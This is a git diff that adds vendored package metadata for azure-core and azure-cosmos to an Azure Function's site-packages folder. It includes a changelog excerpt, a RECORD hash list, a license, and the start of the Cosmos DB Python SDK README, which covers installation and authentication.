+### Features
+
+- Tracing: network span context is available with the TRACING_CONTEXT in pipeline response #7252
+- Tracing: Span contract now has `kind`, `traceparent` and is a context manager #7252
+- SansIOHTTPPolicy methods can now be coroutines #7497
+- Add multipart/mixed support #7083:
+
+  - HttpRequest now has a "set_multipart_mixed" method to set the parts of this request
+  - HttpRequest now has a "prepare_multipart_body" method to build the final body
+  - HttpResponse now has a "parts" method to return an iterator of parts
+  - AsyncHttpResponse now has a "parts" method to return an async iterator of parts
+  - Note that multipart/mixed is a Python 3.x only feature
+
+### Bug fixes
+
+- Tracing: policy cannot fail the pipeline, even in the worst condition #7252
+- Tracing: policy now correctly passes the status message on exception #7252
+- Tracing: incorrect span if exception raised from decorated function #7133
+- Fixed urllib3 ConnectTimeoutError being raised by Requests during a socket timeout. Now this exception is caught and wrapped as a `ServiceRequestError` #7542
+
+### Breaking changes
+
+- Tracing: `azure.core.tracing.context` removed
+- Tracing: `azure.core.tracing.context.tracing_context.with_current_context` renamed to `azure.core.tracing.common.with_current_context` #7252
+- Tracing: `link` renamed `link_from_headers` and `link` now takes a string
+- Tracing: opencensus implementation has been moved to the package `azure-core-tracing-opencensus`
+- Some modules and classes that were importable from several different places have been removed:
+
+  - `azure.core.HttpResponseError` is now only `azure.core.exceptions.HttpResponseError`
+  - `azure.core.Configuration` is now only `azure.core.configuration.Configuration`
+  - `azure.core.HttpRequest` is now only `azure.core.pipeline.transport.HttpRequest`
+  - `azure.core.version` module has been removed. Use `azure.core.__version__` to get version number.
+  - `azure.core.pipeline_client` has been removed. Import from `azure.core` instead.
+  - `azure.core.pipeline_client_async` has been removed. Import from `azure.core` instead.
+  - `azure.core.pipeline.base` has been removed. Import from `azure.core.pipeline` instead.
+  - `azure.core.pipeline.base_async` has been removed. Import from `azure.core.pipeline` instead.
+  - `azure.core.pipeline.policies.base` has been removed. Import from `azure.core.pipeline.policies` instead.
+  - `azure.core.pipeline.policies.base_async` has been removed. Import from `azure.core.pipeline.policies` instead.
+  - `azure.core.pipeline.policies.authentication` has been removed. Import from `azure.core.pipeline.policies` instead.
+  - `azure.core.pipeline.policies.authentication_async` has been removed. Import from `azure.core.pipeline.policies` instead.
+  - `azure.core.pipeline.policies.custom_hook` has been removed. Import from `azure.core.pipeline.policies` instead.
+  - `azure.core.pipeline.policies.redirect` has been removed. Import from `azure.core.pipeline.policies` instead.
+  - `azure.core.pipeline.policies.redirect_async` has been removed. Import from `azure.core.pipeline.policies` instead.
+  - `azure.core.pipeline.policies.retry` has been removed. Import from `azure.core.pipeline.policies` instead.
+  - `azure.core.pipeline.policies.retry_async` has been removed. Import from `azure.core.pipeline.policies` instead.
+  - `azure.core.pipeline.policies.distributed_tracing` has been removed.
Import from `azure.core.pipeline.policies` instead.
+  - `azure.core.pipeline.policies.universal` has been removed. Import from `azure.core.pipeline.policies` instead.
+  - `azure.core.tracing.abstract_span` has been removed. Import from `azure.core.tracing` instead.
+  - `azure.core.pipeline.transport.base` has been removed. Import from `azure.core.pipeline.transport` instead.
+  - `azure.core.pipeline.transport.base_async` has been removed. Import from `azure.core.pipeline.transport` instead.
+  - `azure.core.pipeline.transport.requests_basic` has been removed. Import from `azure.core.pipeline.transport` instead.
+  - `azure.core.pipeline.transport.requests_asyncio` has been removed. Import from `azure.core.pipeline.transport` instead.
+  - `azure.core.pipeline.transport.requests_trio` has been removed. Import from `azure.core.pipeline.transport` instead.
+  - `azure.core.pipeline.transport.aiohttp` has been removed. Import from `azure.core.pipeline.transport` instead.
+  - `azure.core.polling.poller` has been removed. Import from `azure.core.polling` instead.
+  - `azure.core.polling.async_poller` has been removed. Import from `azure.core.polling` instead.
+
+## 1.0.0b3 (2019-09-09)
+
+### Bug fixes
+
+- Fix aiohttp auto-headers #6992
+- Add tracing to policies module init #6951
+
+## 1.0.0b2 (2019-08-05)
+
+### Breaking changes
+
+- Transport classes don't take `config` parameter anymore (use kwargs instead) #6372
+- `azure.core.paging` has been completely refactored #6420
+- HttpResponse.content_type attribute is now a string (was a list) #6490
+- For `StreamDownloadGenerator` subclasses, `response` is now an `HttpResponse`, and not a transport response like `aiohttp.ClientResponse` or `requests.Response`. The transport response is available in the `internal_response` attribute #6490
+
+### Bug fixes
+
+- aiohttp is not required to import async pipeline classes #6496
+- `AsyncioRequestsTransport.sleep` is now a coroutine as expected #6490
+- `RequestsTransport` is no longer tied to `ProxyPolicy` implementation details #6372
+- `AiohttpTransport` does not raise on unexpected kwargs #6355
+
+### Features
+
+- New paging base classes that support `continuation_token` and `by_page()` #6420
+- Proxy support for `AiohttpTransport` #6372
+
+## 1.0.0b1 (2019-06-26)
+
+- Preview 1 release
+
+
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/RECORD
new file mode 100644
index 0000000..2b09c69
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/RECORD
@@ -0,0 +1,145 @@
+azure/core/__init__.py,sha256=UNNuU_GpTKOua8WkZkBzdLKd8KMrNbtrPtd8v2xsZFE,1790
+azure/core/__pycache__/__init__.cpython-39.pyc,,
+azure/core/__pycache__/_enum_meta.cpython-39.pyc,,
+azure/core/__pycache__/_match_conditions.cpython-39.pyc,,
+azure/core/__pycache__/_pipeline_client.cpython-39.pyc,,
+azure/core/__pycache__/_pipeline_client_async.cpython-39.pyc,,
+azure/core/__pycache__/_version.cpython-39.pyc,,
+azure/core/__pycache__/async_paging.cpython-39.pyc,,
+azure/core/__pycache__/configuration.cpython-39.pyc,,
+azure/core/__pycache__/credentials.cpython-39.pyc,,
+azure/core/__pycache__/credentials_async.cpython-39.pyc,,
+azure/core/__pycache__/exceptions.cpython-39.pyc,,
+azure/core/__pycache__/messaging.cpython-39.pyc,,
+azure/core/__pycache__/paging.cpython-39.pyc,,
+azure/core/__pycache__/serialization.cpython-39.pyc,, +azure/core/__pycache__/settings.cpython-39.pyc,, +azure/core/_enum_meta.py,sha256=A5cT4ceRM_KROd3XE3Lka4WlN_GvBDDdzi3mf6_Nywc,2549 +azure/core/_match_conditions.py,sha256=UdLPTnjxbLPoLUOOG96UjztmjYKnZwu8Aq0Hc30xDVQ,1506 +azure/core/_pipeline_client.py,sha256=aLqGyeulEAjIYR8s-3eDjCqrtXxmOoiSzjl1GSqk2Gs,8138 +azure/core/_pipeline_client_async.py,sha256=xti0sAOYuqdqs3FldrnGEnqGIvLjZOzhUvMol7pKZ88,9070 +azure/core/_version.py,sha256=v83ei7UnX7OBxKOqHZPToh6y5a2BjgKXPDpUcv8ZgYk,493 +azure/core/async_paging.py,sha256=me6I71wQ9vB7qOZ-_7Wis1hvlBhNu_ficR7WXgdC7lQ,6037 +azure/core/configuration.py,sha256=WXUMf_LGC6hRLXhem5YDqttO-ZDHUNbwQMpIGRphK50,5609 +azure/core/credentials.py,sha256=JncR7S2mNmuGzIuSUk8PRNxXe2NbnJ1QOubI6HsjdIQ,5774 +azure/core/credentials_async.py,sha256=y9cS-roHDr1-Ie0Iz0Wd2R3E8wBdJ0tqef3eQBaq7ik,1227 +azure/core/exceptions.py,sha256=DrSey5jQmhqDKLDCU_OhlS32solRdKDGiiU4bvJdeyk,20142 +azure/core/messaging.py,sha256=gxEUVPjaLrr7eWimXjcpcxycrioyYGxMu37JFSZ08R4,8891 +azure/core/paging.py,sha256=ch7kQQHpDVtEmLTVc8z5NdflxItE3rxDoidVdTl8_Bs,4891 +azure/core/pipeline/__init__.py,sha256=TLH4nNCQ2LhQfBHSpytpYjUslMcLEnT_m_9l_xk0v1M,7277 +azure/core/pipeline/__pycache__/__init__.cpython-39.pyc,, +azure/core/pipeline/__pycache__/_base.cpython-39.pyc,, +azure/core/pipeline/__pycache__/_base_async.cpython-39.pyc,, +azure/core/pipeline/__pycache__/_tools.cpython-39.pyc,, +azure/core/pipeline/__pycache__/_tools_async.cpython-39.pyc,, +azure/core/pipeline/_base.py,sha256=3WJ_8PuhO59_TZWiAlBGdvyMcDt0GQ6Zc3XtKpC2fLA,8228 +azure/core/pipeline/_base_async.py,sha256=H6VWlzsLdHqzfXN-Ue4ntaCU5Rz7_Y8KvBmKXAkg9I4,8716 +azure/core/pipeline/_tools.py,sha256=Teaw6l4Bb6MoQgVuxoWvg7rV-_ykok0N91AOQqbDQPw,2741 +azure/core/pipeline/_tools_async.py,sha256=f64IEsu2HiuQ7rZ7EFIokAbbG7cqlG-HL1cq3J23vbQ,2188 +azure/core/pipeline/policies/__init__.py,sha256=iQHzPD52APenz4Y3XX0yrRjKZqul-x48w7AERmEWW0E,2787 +azure/core/pipeline/policies/__pycache__/__init__.cpython-39.pyc,, +azure/core/pipeline/policies/__pycache__/_authentication.cpython-39.pyc,, +azure/core/pipeline/policies/__pycache__/_authentication_async.cpython-39.pyc,, +azure/core/pipeline/policies/__pycache__/_base.cpython-39.pyc,, +azure/core/pipeline/policies/__pycache__/_base_async.cpython-39.pyc,, +azure/core/pipeline/policies/__pycache__/_custom_hook.cpython-39.pyc,, +azure/core/pipeline/policies/__pycache__/_distributed_tracing.cpython-39.pyc,, +azure/core/pipeline/policies/__pycache__/_redirect.cpython-39.pyc,, +azure/core/pipeline/policies/__pycache__/_redirect_async.cpython-39.pyc,, +azure/core/pipeline/policies/__pycache__/_retry.cpython-39.pyc,, +azure/core/pipeline/policies/__pycache__/_retry_async.cpython-39.pyc,, +azure/core/pipeline/policies/__pycache__/_universal.cpython-39.pyc,, +azure/core/pipeline/policies/__pycache__/_utils.cpython-39.pyc,, +azure/core/pipeline/policies/_authentication.py,sha256=yXi_LYgTIcCogBq4cCBAwLLGSWT-YcSiyXy7WsY-rqQ,9128 +azure/core/pipeline/policies/_authentication_async.py,sha256=5AdK4FLzcBjVven90V1E2oH-8nJNanySyFnAmu43h6M,6150 +azure/core/pipeline/policies/_base.py,sha256=XCoLZEYUPlogtgIQjZzUQUkjwsHZxRy9-oFz99A6iM8,5738 +azure/core/pipeline/policies/_base_async.py,sha256=-ZxsftPaqeGGHvPEGIp1pwyOGwW0ejzJ2NrJTQn_Av8,3205 +azure/core/pipeline/policies/_custom_hook.py,sha256=srdn66i2S3a0EgjAWtRZrrcQmG0NOzcl0B4vnNSA2kY,3405 +azure/core/pipeline/policies/_distributed_tracing.py,sha256=SFn7EUV1FBzLOfogaUOi-MNL1K7MouJpj7oa59x7-7o,5602 
+azure/core/pipeline/policies/_redirect.py,sha256=ATlSoK4AFxJkqhbj-8pfcUogIRNQn7w4Sv5-XRk1YbI,7155 +azure/core/pipeline/policies/_redirect_async.py,sha256=NibTj1tsEdA5bX86j2cX_dv3w21bp0AajOf2awiSVTk,3368 +azure/core/pipeline/policies/_retry.py,sha256=VJNB3MAovSR_G229_0y4JjK9MOLzOj0uKwaxxs0Udks,20857 +azure/core/pipeline/policies/_retry_async.py,sha256=AvO-mulEyGJj_8dsi0-ZuKelZh5iN47H1xzVAbiFiRA,8043 +azure/core/pipeline/policies/_universal.py,sha256=IfY5w-mwaNE4N5HTMPtCTvSXueUsRbsk5lyB4C6Idb0,30074 +azure/core/pipeline/policies/_utils.py,sha256=2A9XSTnnIaVungDXTCSCd5xcWCW6GIYIoIaF1Onrtsg,2785 +azure/core/pipeline/transport/__init__.py,sha256=kMLW4m5QVBIN5eacIDpLYY01vvs-722nva5UuUIdsQo,6269 +azure/core/pipeline/transport/__pycache__/__init__.cpython-39.pyc,, +azure/core/pipeline/transport/__pycache__/_aiohttp.cpython-39.pyc,, +azure/core/pipeline/transport/__pycache__/_base.cpython-39.pyc,, +azure/core/pipeline/transport/__pycache__/_base_async.cpython-39.pyc,, +azure/core/pipeline/transport/__pycache__/_base_requests_async.cpython-39.pyc,, +azure/core/pipeline/transport/__pycache__/_bigger_block_size_http_adapters.cpython-39.pyc,, +azure/core/pipeline/transport/__pycache__/_requests_asyncio.cpython-39.pyc,, +azure/core/pipeline/transport/__pycache__/_requests_basic.cpython-39.pyc,, +azure/core/pipeline/transport/__pycache__/_requests_trio.cpython-39.pyc,, +azure/core/pipeline/transport/_aiohttp.py,sha256=wiKFlM7_4QPD9ODvak9fcOU0l6lfKyJWL5L0O7PW6s0,18124 +azure/core/pipeline/transport/_base.py,sha256=TyOV4tEDGKvsB3N2meG06vKxAXo5df29ulzdJySRyOw,26854 +azure/core/pipeline/transport/_base_async.py,sha256=LLFb_Agxgn-shYQKuXaoICIsYG6tjL8U_P2QbcfIDyU,4848 +azure/core/pipeline/transport/_base_requests_async.py,sha256=8oo3z2tNIxmnqFvlT0IxXEIIMaSEn6jJO9RSk6UWgAU,2326 +azure/core/pipeline/transport/_bigger_block_size_http_adapters.py,sha256=3J9XvXT0m1Cb4QtZ5IvLn8GwhkFGKSoTKO6kavdmLmI,2177 +azure/core/pipeline/transport/_requests_asyncio.py,sha256=xhInFUGAIl9nSoQZgBALxuZXgNecvvlbNM16KRY9UWs,11013 +azure/core/pipeline/transport/_requests_basic.py,sha256=Yd_wwV8b15jXJyCYfdDDRQA0pKdx8589kTbhTKb6K3I,15200 +azure/core/pipeline/transport/_requests_trio.py,sha256=DyHX-UyWkUjVMVLIxluxNhIEXkfUap18jqMoj3iTdFs,11801 +azure/core/polling/__init__.py,sha256=ERr8iZ2zn9qcWbhFV2HV1UlAgHaEE28woP_hFix6yJI,1728 +azure/core/polling/__pycache__/__init__.cpython-39.pyc,, +azure/core/polling/__pycache__/_async_poller.cpython-39.pyc,, +azure/core/polling/__pycache__/_poller.cpython-39.pyc,, +azure/core/polling/__pycache__/async_base_polling.cpython-39.pyc,, +azure/core/polling/__pycache__/base_polling.cpython-39.pyc,, +azure/core/polling/_async_poller.py,sha256=phsRpKCsl38njkhexv9dK4lfVvXzKi4bQsKxTuKVWiQ,7923 +azure/core/polling/_poller.py,sha256=umaQcxKPBmfhL8pfvqxd1l9fQpqytVUAVUzd45XlD8A,11619 +azure/core/polling/async_base_polling.py,sha256=MDeE0-DgwIpFu94MlOqtK6QFDKqfKQvLtlayq7bL7NQ,5579 +azure/core/polling/base_polling.py,sha256=1xeTOWdm0umObOy_ja44f6sr6qWKLzH2ulDTWKdguNg,22086 +azure/core/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +azure/core/rest/__init__.py,sha256=cudRw63l2iHhs58vrYie2pJ686jeBxoCTaXCtmTtcDY,1768 +azure/core/rest/__pycache__/__init__.cpython-39.pyc,, +azure/core/rest/__pycache__/_aiohttp.cpython-39.pyc,, +azure/core/rest/__pycache__/_helpers.cpython-39.pyc,, +azure/core/rest/__pycache__/_http_response_impl.cpython-39.pyc,, +azure/core/rest/__pycache__/_http_response_impl_async.cpython-39.pyc,, +azure/core/rest/__pycache__/_requests_asyncio.cpython-39.pyc,, 
+azure/core/rest/__pycache__/_requests_basic.cpython-39.pyc,, +azure/core/rest/__pycache__/_requests_trio.cpython-39.pyc,, +azure/core/rest/__pycache__/_rest.cpython-39.pyc,, +azure/core/rest/__pycache__/_rest_py3.cpython-39.pyc,, +azure/core/rest/_aiohttp.py,sha256=brFAVmwZRi8K1sHWLccZw9p-L14uoQ4d-IYlw02j7R0,7219 +azure/core/rest/_helpers.py,sha256=gnyXIb_6gRTaw1tKn7fcoNl5t_GhP-LkGL4nstHrG60,13023 +azure/core/rest/_http_response_impl.py,sha256=6C54bg4mSkUl9vCgO8X-lKC3j277KuNjCrkoJykoRZ0,16737 +azure/core/rest/_http_response_impl_async.py,sha256=nQPHDUt3qVW8Bwoj7sJNo7ZwOXvunZGJg5yvR3WkAIw,6632 +azure/core/rest/_requests_asyncio.py,sha256=52vfjW6VbDzd6np0_w-1FANZicXLUO9Pz4kAA7Sgd9Q,2139 +azure/core/rest/_requests_basic.py,sha256=0Thaz0Gy7RadYRR5EoA9SX7i2vO-C-8v8lONUwO2fqk,4205 +azure/core/rest/_requests_trio.py,sha256=9UBWN_KLnhpOD8sF-YclbQT-gMXlB4GYeEqichDJDMc,2034 +azure/core/rest/_rest.py,sha256=WcGMWGRjeWX71LRIbaoJVcUyfch21_BwEVEO3TqvNIs,12003 +azure/core/rest/_rest_py3.py,sha256=Mo2Afc9u_9AgNBnGjwv9e0xv2d9oWrpHKS8eeXco_0M,13526 +azure/core/serialization.py,sha256=A1B2oLjKKg4wjI8BZENjTDPNQxHPzReiufwslveFOhU,3896 +azure/core/settings.py,sha256=GQCjmokZyyhp48a5SAGN4xxR3OUY14V8DQAv2Vpa4OM,13704 +azure/core/tracing/__init__.py,sha256=_9wnZW_6HABX9jE38u3cyUHQRfREMc5M_WV-QUG8ons,312 +azure/core/tracing/__pycache__/__init__.cpython-39.pyc,, +azure/core/tracing/__pycache__/_abstract_span.cpython-39.pyc,, +azure/core/tracing/__pycache__/common.cpython-39.pyc,, +azure/core/tracing/__pycache__/decorator.cpython-39.pyc,, +azure/core/tracing/__pycache__/decorator_async.cpython-39.pyc,, +azure/core/tracing/_abstract_span.py,sha256=RMidszH12QVzirZqcOZdpTUEXkE6kHz5z9S8fb-_nxM,7618 +azure/core/tracing/common.py,sha256=GDaDzpT-_fGMPuD2C7UozQYpyefcNFE6hyWhQzQQS2o,3969 +azure/core/tracing/decorator.py,sha256=K0aup7ZKG7F_zSt6QfNmZE2Vp7k2CJSSwT4wivFyN-c,3672 +azure/core/tracing/decorator_async.py,sha256=uQnYF7vsm37yRsN7sAxH5GUOQFNm-nEDa9UG01k3QQ4,3807 +azure/core/tracing/ext/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +azure/core/tracing/ext/__pycache__/__init__.cpython-39.pyc,, +azure/core/utils/__init__.py,sha256=tWKk3qMDB6SsIX-NWmp5Ut28A5wyxoPPoj29Jj44vQM,1608 +azure/core/utils/__pycache__/__init__.cpython-39.pyc,, +azure/core/utils/__pycache__/_connection_string_parser.cpython-39.pyc,, +azure/core/utils/__pycache__/_messaging_shared.cpython-39.pyc,, +azure/core/utils/__pycache__/_pipeline_transport_rest_shared.cpython-39.pyc,, +azure/core/utils/__pycache__/_pipeline_transport_rest_shared_async.cpython-39.pyc,, +azure/core/utils/__pycache__/_utils.cpython-39.pyc,, +azure/core/utils/_connection_string_parser.py,sha256=6dTmMa0S1Coq8AfdHq2o23f9h-R4GGRaeQwJEtifutw,2197 +azure/core/utils/_messaging_shared.py,sha256=jshGkPiWzxDNG_rDLEVue01EV5GWKs1IzaKZixXYOsA,1526 +azure/core/utils/_pipeline_transport_rest_shared.py,sha256=_TJ6ONW0rrG7Vy0H9z8FRDQDbXkJWWCgR98Ki4L-o1Y,13621 +azure/core/utils/_pipeline_transport_rest_shared_async.py,sha256=8O8pOsCxGHjafs2wvYfsS2LyhKZgSvvewxV1nSCSwAI,2459 +azure/core/utils/_utils.py,sha256=HPktJIvopAbolh8-hjt-X1umQ052jEWGQ2wMlAkkaiY,3699 +azure_core-1.24.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +azure_core-1.24.2.dist-info/LICENSE,sha256=_VMkgdgo4ToLE8y1mOAjOKNhd0BnWoYu5r3BVBto6T0,1073 +azure_core-1.24.2.dist-info/METADATA,sha256=8SSYAxah_qhri783JgJcL-lHuhAP0c_QXa0C7s2o8SM,32311 +azure_core-1.24.2.dist-info/RECORD,, +azure_core-1.24.2.dist-info/WHEEL,sha256=ewwEueio1C2XeHTvT17n8dZUJgOvyCWCt0WVNLClP9o,92 
+azure_core-1.24.2.dist-info/top_level.txt,sha256=S7DhWV9m80TBzAhOFjxDUiNbKszzoThbnrSz5MpbHSQ,6 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/WHEEL new file mode 100644 index 0000000..725a409 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.0) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/top_level.txt new file mode 100644 index 0000000..f6434ca --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/top_level.txt @@ -0,0 +1 @@ +azure diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/LICENSE new file mode 100644 index 0000000..4437826 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/LICENSE @@ -0,0 +1,21 @@ +Copyright (c) Microsoft Corporation. + +MIT License + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. 
\ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/METADATA new file mode 100644 index 0000000..b88be26 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_cosmos-4.3.0.dist-info/METADATA @@ -0,0 +1,1018 @@ +Metadata-Version: 2.1 +Name: azure-cosmos +Version: 4.3.0 +Summary: Microsoft Azure Cosmos Client Library for Python +Home-page: https://github.com/Azure/azure-sdk-for-python +Author: Microsoft Corporation +Author-email: askdocdb@microsoft.com +Maintainer: Microsoft +Maintainer-email: askdocdb@microsoft.com +License: MIT License +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: Natural Language :: English +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: License :: OSI Approved :: MIT License +Requires-Python: >=3.6 +Description-Content-Type: text/markdown +Requires-Dist: azure-core (<2.0.0,>=1.23.0) + +## _Disclaimer_ +_Azure SDK Python packages support for Python 2.7 has ended 01 January 2022. For more information and questions, please refer to https://github.com/Azure/azure-sdk-for-python/issues/20691_ + +# Azure Cosmos DB SQL API client library for Python + +Azure Cosmos DB is a globally distributed, multi-model database service that supports document, key-value, wide-column, and graph databases. + +Use the Azure Cosmos DB SQL API SDK for Python to manage databases and the JSON documents they contain in this NoSQL database service. High level capabilities are: + +* Create Cosmos DB **databases** and modify their settings +* Create and modify **containers** to store collections of JSON documents +* Create, read, update, and delete the **items** (JSON documents) in your containers +* Query the documents in your database using **SQL-like syntax** + +[SDK source code][source_code] | [Package (PyPI)][cosmos_pypi] | [API reference documentation][ref_cosmos_sdk] | [Product documentation][cosmos_docs] | [Samples][cosmos_samples] + +> This SDK is used for the [SQL API](https://docs.microsoft.com/azure/cosmos-db/sql-query-getting-started). For all other APIs, please check the [Azure Cosmos DB documentation](https://docs.microsoft.com/azure/cosmos-db/introduction) to evaluate the best SDK for your project. + +## Getting started + +### Important update on Python 2.x Support + +New releases of this SDK won't support Python 2.x starting January 1st, 2022. Please check the [CHANGELOG](https://github.com/Azure/azure-sdk-for-python/blob/main/sdk/cosmos/azure-cosmos/CHANGELOG.md) for more information. 
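+
+Before the setup details below, here is a compact, hedged sketch of those high-level capabilities. It assumes the `ACCOUNT_URI`/`ACCOUNT_KEY` environment variables configured later in this README, and the database/container names and items are illustrative only.
+
+```Python
+import os
+from azure.cosmos import CosmosClient, PartitionKey
+
+client = CosmosClient(os.environ['ACCOUNT_URI'], credential=os.environ['ACCOUNT_KEY'])
+
+# Create a database and a container (no-ops if they already exist).
+database = client.create_database_if_not_exists(id='testdb')
+container = database.create_container_if_not_exists(
+    id='products', partition_key=PartitionKey(path='/category'))
+
+# Create (upsert) an item; every item needs a string 'id'.
+container.upsert_item({'id': '1', 'category': 'widgets', 'name': 'gear'})
+
+# Query the container with SQL-like syntax.
+for item in container.query_items(
+        query='SELECT * FROM c WHERE c.category = @cat',
+        parameters=[{'name': '@cat', 'value': 'widgets'}],
+        enable_cross_partition_query=True):
+    print(item['name'])
+```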
+
+### Prerequisites
+
+* Azure subscription - [Create a free account][azure_sub]
+* Azure [Cosmos DB account][cosmos_account] - SQL API
+* [Python 3.6+][python]
+
+If you need a Cosmos DB SQL API account, you can create one with this [Azure CLI][azure_cli] command:
+
+```Bash
+az cosmosdb create --resource-group <resource-group-name> --name <cosmos-account-name>
+```
+
+### Install the package
+
+```bash
+pip install azure-cosmos
+```
+
+#### Configure a virtual environment (optional)
+
+Although not required, you can keep your base system and Azure SDK environments isolated from one another if you use a virtual environment. Execute the following commands to configure and then enter a virtual environment with [venv][venv]:
+
+```Bash
+python3 -m venv azure-cosmosdb-sdk-environment
+source azure-cosmosdb-sdk-environment/bin/activate
+```
+
+### Authenticate the client
+
+Interaction with Cosmos DB starts with an instance of the [CosmosClient][ref_cosmosclient] class. You need an **account**, its **URI**, and one of its **account keys** to instantiate the client object.
+
+Use the Azure CLI snippet below to populate two environment variables with the database account URI and its primary master key (you can also find these values in the Azure portal). The snippet is formatted for the Bash shell.
+
+```Bash
+RES_GROUP=<resource-group-name>
+ACCT_NAME=<cosmos-db-account-name>
+
+export ACCOUNT_URI=$(az cosmosdb show --resource-group $RES_GROUP --name $ACCT_NAME --query documentEndpoint --output tsv)
+export ACCOUNT_KEY=$(az cosmosdb list-keys --resource-group $RES_GROUP --name $ACCT_NAME --query primaryMasterKey --output tsv)
+```
+
+### Create the client
+
+Once you've populated the `ACCOUNT_URI` and `ACCOUNT_KEY` environment variables, you can create the [CosmosClient][ref_cosmosclient].
+
+```Python
+from azure.cosmos import CosmosClient
+
+import os
+URL = os.environ['ACCOUNT_URI']
+KEY = os.environ['ACCOUNT_KEY']
+client = CosmosClient(URL, credential=KEY)
+```
+
+### AAD Authentication
+
+You can also authenticate a client using your service principal's AAD credentials and the azure-identity package.
+You can pass the credential information directly to `ClientSecretCredential`, or use `DefaultAzureCredential`:
+```Python
+from azure.cosmos import CosmosClient
+from azure.identity import ClientSecretCredential, DefaultAzureCredential
+
+import os
+url = os.environ['ACCOUNT_URI']
+tenant_id = os.environ['TENANT_ID']
+client_id = os.environ['CLIENT_ID']
+client_secret = os.environ['CLIENT_SECRET']
+
+# Using ClientSecretCredential
+aad_credentials = ClientSecretCredential(
+    tenant_id=tenant_id,
+    client_id=client_id,
+    client_secret=client_secret)
+
+# Using DefaultAzureCredential (recommended)
+aad_credentials = DefaultAzureCredential()
+
+client = CosmosClient(url, aad_credentials)
+```
+Always ensure that the managed identity you use for AAD authentication has `readMetadata` permissions.
+More information on how to set up AAD authentication: [Set up RBAC for AAD authentication](https://docs.microsoft.com/azure/cosmos-db/how-to-setup-rbac)
+More information on allowed operations for AAD-authenticated clients: [RBAC Permission Model](https://aka.ms/cosmos-native-rbac)
+
+## Key concepts
+
+Once you've initialized a [CosmosClient][ref_cosmosclient], you can interact with the primary resource types in Cosmos DB:
+
+* [Database][ref_database]: A Cosmos DB account can contain multiple databases. When you create a database, you specify the API you'd like to use when interacting with its documents: SQL, MongoDB, Gremlin, Cassandra, or Azure Table. Use the [DatabaseProxy][ref_database] object to manage its containers.
+
+* [Container][ref_container]: A container is a collection of JSON documents. You create (insert), read, update, and delete items in a container by using methods on the [ContainerProxy][ref_container] object.
+
+* Item: An Item is the dictionary-like representation of a JSON document stored in a container. Each Item you add to a container must include an `id` key with a value that uniquely identifies the item within the container.
+
+For more information about these resources, see [Working with Azure Cosmos databases, containers and items][cosmos_resources].
+
+
+## How to use `enable_cross_partition_query`
+
+The keyword argument `enable_cross_partition_query` accepts two options: `None` (default) or `True`.
+
+## Note on using queries by id
+
